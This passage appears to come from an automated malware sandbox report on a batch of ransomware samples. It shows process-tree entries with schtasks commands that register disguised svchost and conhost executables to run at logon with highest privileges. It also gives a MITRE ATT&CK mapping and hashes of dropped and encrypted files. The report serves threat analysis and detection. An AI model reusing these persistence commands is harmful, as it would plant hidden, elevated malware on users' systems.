      Scheduled Task/Job: Scheduled Task
      PID:17668
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6960
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\reports\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:17924
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\PerfLogs\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:10440
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\squid\etc\WmiPrvSE.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:16140
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9976
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\squid\sbin\conhost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:16336
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9680
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1532
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\ProgramData\Documents\cmd.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:16320
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\ProgramData\SoftwareDistribution\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1656
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\PerfLogs\svchost.exe'" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:17192
  - - C:\PerfLogs\svchost.exe
      "C:\PerfLogs\svchost.exe"
      4⤵
      PID:16492
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 16492 -s 1800
        5⤵
        Program crash
        
        PID:5204

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1532 -ip 1532
1⤵
PID:7920

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:6988

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\edbwKqkI.bat"
1⤵
PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 16492 -ip 16492
1⤵
PID:17956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\FG69_README.rtf

Filesize
7KB

MD5
2bc61142ab8d01496c9968c6bad3bc27

SHA1
b26cdf0a9bcf7e68b7eece4b7cd01c06448efdf0

SHA256
49833276311e95e29f3122b6696bbad9524d93717c0f4520c1053a54fabe01ec

SHA512
64451ce672a1f1d0c1cdf3446ea6945127f704d14e056a27b25c0181088a4ccca649f2c2aed4c9a7cc4ac4cd8531d57624d3629bd8dfcfd81075b8a6d29ef994

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-610507CA.[[email protected]].arrow

Filesize
2.7MB

MD5
2e22f88057de3655f94d1204d357d4f1

SHA1
20bbe5f2bc4478557dd0776e744442787eb59a98

SHA256
83f3a5246c2aeac2b224f8d0759953ed96dd6d1e1eb7cd68f43118081efe3113

SHA512
2285b2e3909aa28ea81d96dc8d27320b22eee29527ba680f14564705758e6277e6b92eba89c87b3ac31f4acc6e156ed12f035e5072555a89033f1f802410b74d

Download Submit
C:\ProgramData\R3ADM3.txt

Filesize
1KB

MD5
963a5e0b43584c2831094180bf3de45c

SHA1
79c51ea46fe19dbd1182aae402503baaff89ac80

SHA256
ac54004ebc46a1515e1fb6edce6e4dfb3517eb902e98bd443f03ac1b6e3b7100

SHA512
468e6b723e3ced4c0ea4d85c489cddc8039567eeca9ead884f93c8e377327ddcb79268431e227c9eaa8089f08786e45adf672a3cf4a8aa1d5d491e7db8c1e42c

Download Submit
C:\ProgramData\R3ADM3.txt.id-E87CF400.[[email protected]].artemis

Filesize
32B

MD5
70bc8f4b72a86921468bf8e8441dce51

SHA1
de8a847bff8c343d69b853a215e6ee775ef2ef96

SHA256
66687aadf862bd776c8fc18b8e9f8e20089714856ee233b3902a591d0d5f2925

SHA512
5046adc1dba838867b2bbbfdd0c3423e58b57970b5267a90f57960924a87f1960a6a85eaa642dac835424b5d7c8d637c00408c7a73da672b7f498521420b6dd3

Download Submit
C:\ProgramData\USOShared\Logs\User\svchost.exe

Filesize
1.7MB

MD5
012163c07679c6a2ec2e07281668d1a2

SHA1
b24cf061d8de7783afc61cf18546339d3bb9eb0c

SHA256
eb0605f0de19d71d0e95bb1e41967823f9c06d399a58a75a18a0c587a3e70f76

SHA512
021839cdb005771bda885c38d89a662421370d9c60a5481d3a8bc74b43e7453261937828a099d9f12e1a24f48d7bb0c481f17e4241c6ff38dcc66ad39d86f9f1

Download Submit
C:\ProgramData\info-decrypt.hta

Filesize
5KB

MD5
b2bb6853b0e5835e36958bd475488f6b

SHA1
618f9c189fc3d7a969197bd61b01205a454a6c1c

SHA256
9c3499426d6996dd3890be34e63593365c39656ed17a8f97cd9306d5d5a7b6c6

SHA512
979e6dcbe215740b81f615fd3889f36db72982b16199c1a776e604301efe4c66842fbbb101107c16d38a5a16a5614e619b54c38b7002dce1f583e9e25217b43f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GROWTO~2.EXE

Filesize
8.3MB

MD5
2179cf9edcd8891205805db4cf91bd36

SHA1
e79de1e8971ebf8a3b1da14b99d8ee2776da6512

SHA256
8ad88ceb754c1715d803069e6554c1a757180d9ac127a162b60263c30bcb564e

SHA512
51c4da273f545f882911dbb8f0e3665815ede4ebf421994585c836478861950425ab162fdc345667d8a680cdfaedfe57f52716c7d58f8c4fe9a78964b0e6d3c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\VCRUNTIME140.dll

Filesize
81KB

MD5
2ebf45da71bd8ef910a7ece7e4647173

SHA1
4ecc9c2d4abe2180d345f72c65758ef4791d6f06

SHA256
cf39e1e81f57f42f4d60abc1d30ecf7d773e576157aa88bbc1d672bf5ad9bb8b

SHA512
a5d3626553731f7dc70f63d086bd9367ea2c06ad8671e2578e1340af4c44189ecb46a51c88d64a4b082ce68160390c3f8d580dde3984cd254a408f1ef5b28457

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\_ctypes.pyd

Filesize
113KB

MD5
c827a20fc5f1f4e0ef9431f29ebf03b4

SHA1
ee36cb853d79b0ba6b4e99b1ef2fbae840c5489d

SHA256
d500cff28678eced1fc4b3aeabecc0f3b30de735fdefe90855536bc29fc2cb4d

SHA512
d40b816cde6bdf6e46c379674c76f0991268bd1617b96a4e4f944b80e12692ce410e67e006b50b6a8cfaef96aacc6cb806280bac3aa18ee8690669702d01065c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\_socket.pyd

Filesize
67KB

MD5
6b59705d8ac80437dd81260443912532

SHA1
d206d9974167eb60fb201f2b5bf9534167f9fb08

SHA256
62ed631a6ad09e96b4b6f4566c2afc710b3493795edee4cc14a9c9de88230648

SHA512
fa44386b9a305a1221ed79e1ca6d7edf7a8e288836b77cdca8793c82ebf74a0f28a3fc7ae49e14e87029642d81773d960c160c8b3bcb73e8a4ec9a2fd1cdc7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\base_library.zip

Filesize
768KB

MD5
d279d658387a65c174423b338e909b27

SHA1
11f04044a67f10d7ae1497ab018cc189ac8426d6

SHA256
fcad57a3edb526dea7c91218aa0c7fbcf22d378986a8eddc160d94185ce28bcf

SHA512
18617adb3fbf0108fc6f739d8c62008ced06e36818dececd6b4575734b41efc93d2a2a40fd8d59844e708c218952e3639f13b5bf619b3c925a6454dcfc913b35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\libffi-7.dll

Filesize
28KB

MD5
bc20614744ebf4c2b8acd28d1fe54174

SHA1
665c0acc404e13a69800fae94efd69a41bdda901

SHA256
0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

SHA512
0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\python38.dll

Filesize
3.9MB

MD5
c512c6ea9f12847d991ceed6d94bc871

SHA1
52e1ef51674f382263b4d822b8ffa5737755f7e7

SHA256
79545f4f3a658865f510ab7df96516f660e6e18fe12cadaaec3002b51fc29ef6

SHA512
e023a353d6f0267f367276344df5f2fdbc208f916ca87fa5b4310ea7edcac0a24837c23ab671fb4b15b109915dfd0e57fbe07593a764b3219312ed5737052822

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41162\select.pyd

Filesize
23KB

MD5
441299529d0542d828bafe9ac69c4197

SHA1
da31b9afb68ba6e2d40bbc8e1e25980c2afeb1b3

SHA256
973f851dfaf98617b3eb6fa38befeb7ede49bd993408917e207dc7ea399de326

SHA512
9f0fb359a4291d47b8dc0ec789c319637dde0f09e59408c4d7fd9265e51c978aa3ba7ea51ca9524833814bca9e7978d9817658655ee339191634d4ae5f426ddc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lru4xyf5.5hc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
112KB

MD5
a133a8b1f5adf75125a86375a3652278

SHA1
aa0d9980b47f17ff6a274f1ca10a503de79c3688

SHA256
1f3f69de72d2933acfa63220dad8d428bbd047d7e9a4cd9797e5960b763b737b

SHA512
a09807e123c8ceb7cb4a6017c41ff7cc46fa114dc8d0385444926ceb2052c1db53a5e31948b34b301f7f2ce427393f11202987a68f3f800050a03828b75f8cac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.to-3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5.exe

Filesize
92KB

MD5
a59d58c0d8e7d0baa3107eae0e1adbd7

SHA1
d5a8bbc952d160010f39f608f46b2e063d1c4dea

SHA256
3e7f30a802c595379ad3158ffe4ba5bc9e4a4d304430a2d846330adee70dc9a5

SHA512
4224aadf46f6cd2c2ba205ff71f36f589c15b78a48a13651e94117f54b102037d84bdce700aabad32c286a946c16fc82b53751eb4b9118380a89473f5c823d1d

Download Submit
C:\Users\Admin\AppData\Roaming\PDFs Importantes.exe

Filesize
259KB

MD5
f9bb8b532668430045afb22324fe787b

SHA1
e98d58df8fa2faf128f9affd41e91e1248e02e13

SHA256
ae695d2073072a07c873e82eeab56de9a9957b71e04baa14cb9572aeebb68358

SHA512
0183670d1dd60954969d7517a3c91ae4195a900ea3e0b92c61dd9b83e559833cfa333f68cb3d80cb73efc4e992682d7c8d4ba3c3f77f6d254c01409f28c64df6

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe

Filesize
259KB

MD5
00dc14cf47a9ac9af306b9fa3dcc20ef

SHA1
b5e03d7221c5bc731a2f5ba4005c06adb28c9d5f

SHA256
eb4ba6d3d01e42446e98acb4652e7e928326249be72ee94aadeec1cf5215e279

SHA512
1542fac833857a30b2cb9963e637e31135b894aa64f1c54119ecb280e2b7787630aaaf394f3a3511a1d71096913502bb4b7c888b9990ce185d46fb8280d7d51d

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe

Filesize
259KB

MD5
8ed8229da36912d10171e9c4c156f615

SHA1
fede15c8195a88d16a38209981b485f48b1fc0d2

SHA256
26271ff25fb185e83da85622b0a78b5d77ffab13ca4fd12dac6dfb9253346084

SHA512
c2238ff5ea3a6827859e63c0caa50e7a3494079dbfce411ba80e28a696fc0f5f8ced13967258cdcdec505f9dbe6a12e28ced3750198f43efee50b917f09c550c

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe

Filesize
259KB

MD5
db076666d1f04468e40ef60c4a10ddd9

SHA1
55274970e9447ed49c4155da3ddb753f6d413e11

SHA256
1f55048f09e065738217353a17dc7e06e9daa1708c5bb20180916b42498663c5

SHA512
7f54a573a431874ccab282e8e610f64142ba47973fecf8d35c1523295de3c2762540681798b886fafc6886ffaa34fd38f23ecccfaae1501805c23f2b04423aa7

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe

Filesize
259KB

MD5
049c37586f4462625d276885397cbda0

SHA1
21727c87ab6fcb50419f2b34036b852e4d37c07d

SHA256
8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33

SHA512
704bb8a867649d261ec3546d972219323c1e97efb7b3e17fcdd3809c1258524d0ed1da15ea8a305a80e3e9cf8daa2f620aaecb0add8fa2248e76dcd069511307

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe

Filesize
8.2MB

MD5
1e23680ec56ed603798c1e755126bcd3

SHA1
fe4861df8e1f0b2820929ad77040dff4bd76a69f

SHA256
760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d

SHA512
2f0f8d1aa8f87bb0f885dc579bba4dfd1be096a7050d0749d38ac55f3c6c792c80a9166479575416dab42f36ec26729ef9e718d8c1684af735d71f082f30b69b

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.Thanos.gen-cbe82df60bb0dfd79f73daf59231727707e3a1ce8c8ba56a5d98e32d44aed4f5.exe

Filesize
87KB

MD5
71bd7a49a092452a5ccc24dd9ee1df1e

SHA1
f65636c5727f5f9da8b60e79d31a866711cc029a

SHA256
cbe82df60bb0dfd79f73daf59231727707e3a1ce8c8ba56a5d98e32d44aed4f5

SHA512
733fe4c4962110dfcc117543b1dad34c5dc647e94135857ee318881b9f08a055c7f6bbc2ce5340798b874e400b3945b919f60f13e141132742513d6f5fca8091

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryakl.gen-e298ac8c4975ff92788ee7049e39b047d0805c2513f7a5ca4b1e98f8b260b923.exe

Filesize
672KB

MD5
88b18bfdb85a55e0d1f1cb4389a69a69

SHA1
c33d4f634662ab4bf905004f8b68f57d3879f7c8

SHA256
e298ac8c4975ff92788ee7049e39b047d0805c2513f7a5ca4b1e98f8b260b923

SHA512
b2e3fb008aa26d53b37b398d29d11408c3e102140343829cb028831495f6d36e2e581e5d99e3302614013399f0a22b60425fa0e028f8b5c72b3fea42f6058311

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5.exe

Filesize
3.7MB

MD5
03db9dbc27e5a860c57cc748758a717a

SHA1
fcf7b9d94f791168a6dffc33326ecc479f728998

SHA256
70402de980d7cb82134f16705b21b15a381e988604ee1a0408640869437132e5

SHA512
4aedcf005165763e2f06d865e85c14ccd0f8b2559ad73e83176d77a36000b44565ab550cbb57b18680efe3f69c8e2a381cee7792d917e6325a9e8514ddd6cfa8

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Cryptor.gen-6ed577361d0db8b085c54efef19fec4055ecdaaaf65b7ec63134275d93d6f09b.exe

Filesize
185KB

MD5
4117b42b4094f10c0bb4e2876b9cc42a

SHA1
0f1dc9af1214399a898a992a62e654fd614494be

SHA256
6ed577361d0db8b085c54efef19fec4055ecdaaaf65b7ec63134275d93d6f09b

SHA512
e708b1bd03892eeb595d19e315e63289fba1131f5c3c76e1760b4230be4fc6125bb0c56b5f3cfe1ecac181ae64ad149a29844712aeb992c5ca5c7fed369bbb5f

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Foreign.vho-6ef4aa9ec54235327b67e5ecd91508db638318e572dd2e61a20c5b12b713267c.exe

Filesize
372KB

MD5
dabcdcdd8a771b319052099ee616a33e

SHA1
61182ec731be08076c726062c9ab933bfd60919b

SHA256
6ef4aa9ec54235327b67e5ecd91508db638318e572dd2e61a20c5b12b713267c

SHA512
df100efd0fa77bed98a8cf1408c44b35c4ce31ea4de595e13c76cd03461cc2f6ddcd24d3ab2f8280f883b083dd7e61cff8e30f903d38b27a186c6abf4dd22c9d

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Gen.gen-5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f.exe

Filesize
273KB

MD5
d1e12fd121374978deb0c57b2f7d6c33

SHA1
f406986cf8b92a69e89ef553008af1af106afcc9

SHA256
5dbfdec02487b7925e5b390c9d3141b051149364b755a8a2da406673a0c9f91f

SHA512
c96945cbc2e8365940d8de0e069f294841920a613f9e5a43111b9a1f49d750d6822c4f71ee5cf8377373e1b834d63545007356abcd6ddb58da80eb76046f3357

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Generic-05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e.exe

Filesize
2.8MB

MD5
2079b5f7cb45b9509fc153071dec87de

SHA1
488a6a91ed2d177e70c657863513d2431082da8c

SHA256
05bd4ef6b32a66ee100dae0dbf57a9d21fd6c9a57b41db3fc3bf553f2e982d3e

SHA512
d06bfb35cd83d124f76483c111b7c996d7573b0bb843144f2e454bb7ddb92320819b06e93054601d99e1650f7f7421373087d38533c4d5966e6169eb03a8ce16

Download Submit
C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Shade.gen-1f58f9afa91db98e0d7d13ad5d42205f64714281b12e608820d222e95af22881.exe

Filesize
2.3MB

MD5
9f1dfd5c72aaa7ae9589369eb0d75416

SHA1
de8604dc2e0b45336c62c3468d63fda06888b851

SHA256
1f58f9afa91db98e0d7d13ad5d42205f64714281b12e608820d222e95af22881

SHA512
1d901321d9edce46e93d44f8cf3063eab22b430a266bff5de572ac40775aa70038b010d15a51b08ac13a8abab177ec58be5336017bed448f0d31b4da5c61fbf2

Download Submit
C:\Users\Admin\Desktop\00395\NWZVlWxF.exe

Filesize
1.2MB

MD5
23556cf826833342ffa859198330773b

SHA1
26441944ca43630d4d56e2713e1ef593be31c1cd

SHA256
d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829

SHA512
e546850f6c493a7a5ba832de0689c06f66d695cb9426604abd394aceb5ea2905d448d39c6708d3f32fc533058d732175b0062a6fb8e65ba5066de632bb7da870

Download Submit
C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Blocker.lckf-a66091d7ea74ec75541e89e299e55a585aec31e153ef4b367dec10babb76c5bc.exe

Filesize
238KB

MD5
3450eb39f5955a0037b1934c0899cfa5

SHA1
671a6bf8fd5d0dfab590c485b51c8632ddf2564f

SHA256
a66091d7ea74ec75541e89e299e55a585aec31e153ef4b367dec10babb76c5bc

SHA512
4a2cf6437a8acb39bdcd20749d27cf05b3038eda3c154fa43daeee2ea27cfeb743c76f621bf2cd102984d33c45cbd9cb6d78e582c102491c20c605207d6a458c

Download Submit
C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptoff.ad-5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4.exe

Filesize
167KB

MD5
0eb2a24e46e7f85e93359252026fc1ba

SHA1
4ca6758c7643e4c89aab513694725804691bd0db

SHA256
5960341f09dd21b9a9bf5aa2fd869f21c6dc8d469d4974f96644b388ff1864e4

SHA512
afcd774233da85d99594d0fd3e343bb28bb75b8948209b407a4c79bf9be793997c7eea7c32867603f2f70eaf1c01520de9c2228ccdd2bde4459a38d33b97b931

Download Submit
C:\Users\Admin\Desktop\00395\Trojan-Ransom.Win32.Cryptor.dri-64dd179bab62fb8b024a477e6d3b037895d2da1c3bd53c99d251960527203d9c.exe

Filesize
2.5MB

MD5
fd06b41ac2cf7e05a67a0aa0349437cc

SHA1
85f54ede622f4f13cfa627974eb914e08d312ce5

SHA256
64dd179bab62fb8b024a477e6d3b037895d2da1c3bd53c99d251960527203d9c

SHA512
6ca231b5527e8751b6c6ad00011d3016e43c07877572aa1f3125af7bd316cf4da332c0d5114eaaf91ca547f2e354224c635195920f85e10911a330b1473697cb

Download Submit
C:\Users\Admin\Desktop\00395\bad_40DE59CA0A8D5979.txt

Filesize
426KB

MD5
b6ac95989d6dba0042a380489849e64f

SHA1
718440e121a33a9b855806f1f9d04c59bf51a4d4

SHA256
91106c0fb33b7844c943313c9b8ea8bba23903953bfda858b7ceeaf893d1c604

SHA512
364ed011f2ee41ff0492f5ef2ec19433b874826ded9644d9f479c099292d03ab6bee8e73b541648c3fb13bf9a9f6abc8777b7031fa2cd25c4721ca9f894f7ea2

Download Submit
C:\Windows\rss\csrss.exe

Filesize
2.0MB

MD5
b2af3e46c32fb475536cf6ee46603303

SHA1
22a1e2b125715b20f8b94e173f43e1d532525b55

SHA256
4c4e83aa57ea43b82365138eeeed572b4611bd47424dc22215e2209c69203a36

SHA512
56e08a4bb52c1d6ef60f68a506d905151d700f86542c4e3e0edb5ef63a341d6d1abc70423b58c24d120333c2f40d591d70dfa275e924643d25533a2452bcc1f4

Download Submit
C:\squid\share\errors\Danish\ERR_INVALID_RESP

Filesize
992B

MD5
28399de3f81e7ac96a88da06183575dc

SHA1
45eb03a3b5c2d6ba1d568e7d6ca47baf7480e719

SHA256
0cd6adccb8ad453d995e8ca33c6cc9a4af3504ea37a64f064adc22170d370172

SHA512
dca676b75ab20e1ea3f9f861950de47e9b4de88d756c759a73cb2d27e250bf9809552c48e3763c006de82c4fde80a832a27fc9f5815b311ba3ebfaea5b62e72e

Download Submit
C:\squid\share\errors\Korean\ERR_TOO_BIG

Filesize
1KB

MD5
48703baf6cf0acdcb3130d3762bd663f

SHA1
af3423e56b5f6b5630b946ca2a5a7edf8feea80d

SHA256
13cf9c6d6f4f03752c1b72c5085cab9e86378e2180d705cb1b58bfc2451e1a1b

SHA512
6c9aafd69bb3ed2c721bec44783eaa31d0f7cdb1a34e8f74a30d9dc047307a7c9af1d794e3bf2a1fe70e0ddfa927905351f84b244a927f140cade5ced719330f

Download Submit
C:\squid\share\errors\Turkish\ERR_FTP_FORBIDDEN

Filesize
843B

MD5
661258bdd1ab704546c7c32bda75a965

SHA1
34cbc5a3707b7130343e837eaac347adb7ff2ba3

SHA256
05404dbd1ef829c05870ebfddfa8e27d1dddd117610fabc4469422c2949661d6

SHA512
bbec8fc9016d11c0663f6b46e7307746eb479ef8c10fb5802f1f722bc05e4c25d11881496a5c56460e6a5fd1fad29505ba5d3c7e9a944920220adb71c90debce

Download Submit
C:\squid\share\errors\Turkish\ERR_FTP_NOT_FOUND

Filesize
989B

MD5
3fd04f4d3c5041b0a4cbe0aa11a39f7b

SHA1
841f24ec5d6ba0cd3a9a5a6866f4579e67dac40d

SHA256
98a0b7a016c77a1b3d6dc2632facaa8bff21d1c1ba2e1bc5477e13866947abfb

SHA512
a0464b4274690d88502632a18289ea4c9a590b723f9e6a961be530e3aea5b21c39bf6b7b1b5bbc07d11cc94381cace4e99504ba097450bfb6426a0eb4b1c89d4

Download Submit
C:\squid\share\errors\Turkish\ERR_FTP_UNAVAILABLE

Filesize
831B

MD5
97102058950efa03128b934c71f14a23

SHA1
0cbea8d7ad2ff3c9c8fd48c54cd7778e585be18b

SHA256
9035acfed1bb444daa2fc8c0ee6f0762d1d2ba2a26286a49a0cf082b993446eb

SHA512
96fe26936c9b4a9806c3c352c0c37f0c75c7649757939f6349ac8c6c1d9c87b3fae146ec9c0ae3c266bdc7bdc1ee8fb98fb18794c1a0a0f733689168b4253489

Download Submit
\??\c:\users\admin\desktop\00395\heur-trojan-ransom.win32.encoder.gen-87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881.exe

Filesize
2.4MB

MD5
e92705eb87544f7b431f35a3a197d009

SHA1
efffecde61605ee967947b9f959455f6e40af0e7

SHA256
87023bcd5a3fd1b751c150b272ec9a2d1448de60710cc2c6d975b6dcef765881

SHA512
1d7d9964ebd91ee955a18d91f334f8cf2555f021ba9dd3f875d3c6e723e2374e058a21dfdaa8687ae2d6319f692d624b83ac1a8d825f4c0091d2fc717049c875

Download Submit
\??\c:\users\admin\desktop\00395\trojan-ransom.msil.xcrypto.d-20ff3ee05f1dffc81e04f2917f8e47d569c3c0b41145e1a8f95ab8c69d5259d3.exe

Filesize
1.0MB

MD5
aeb02c0c6e8ee7462e32389017584ae2

SHA1
2a94792d0ff836fc87c30bbca0ee9c6396de2f9d

SHA256
20ff3ee05f1dffc81e04f2917f8e47d569c3c0b41145e1a8f95ab8c69d5259d3

SHA512
